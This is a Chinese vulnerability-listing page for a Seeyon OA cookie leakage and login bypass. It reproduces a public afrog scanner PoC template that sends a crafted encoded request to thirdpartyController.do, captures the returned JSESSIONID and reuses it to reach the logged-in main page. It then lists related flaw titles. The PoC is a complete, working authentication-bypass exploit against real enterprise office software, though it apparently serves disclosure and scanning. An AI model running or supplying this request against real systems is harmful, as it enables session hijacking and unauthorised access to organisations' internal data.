seeyon-oa-cookie-leak-login-bypass: Seeyon OA Cookie Leakage

日期: 2025-09-01 | 影响软件: seeyon-oa | POC: 已公开

漏洞描述

app="Seeyon-A8"

PoC代码[已公开]

id: seeyon-oa-cookie-leak-login-bypass

info:
    name: Seeyon OA Cookie Leakage
    author: Print1n(http://print1n.top)
    severity: critical
    verified: true
    description: app="Seeyon-A8"
    reference:
        - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg

rules:
    r0:
        request:
            method: POST
            path: /seeyon/thirdpartyController.do
            body: method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
        expression: response.status == 200 && "JSESSIONID=(.*)".bmatches(response.raw_header)
        output:
            search: '"JSESSIONID=(?P<mycookie>.*?);".bsubmatch(response.raw_header)'
            mycookie: search["mycookie"]
    r1:
        request:
            method: GET
            path: /seeyon/main.do
            headers:
                Cookie: "JSESSIONID={{mycookie}}"
        expression: response.status == 200 && response.body.bcontains(b"<a href='/seeyon/main.do?method=logout'")
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/disclosure/seeyon-oa-cookie-leak-login-bypass.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

seeyon-oa-ajax-fileupload: 致远OA ajax.do 任意文件上传 POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC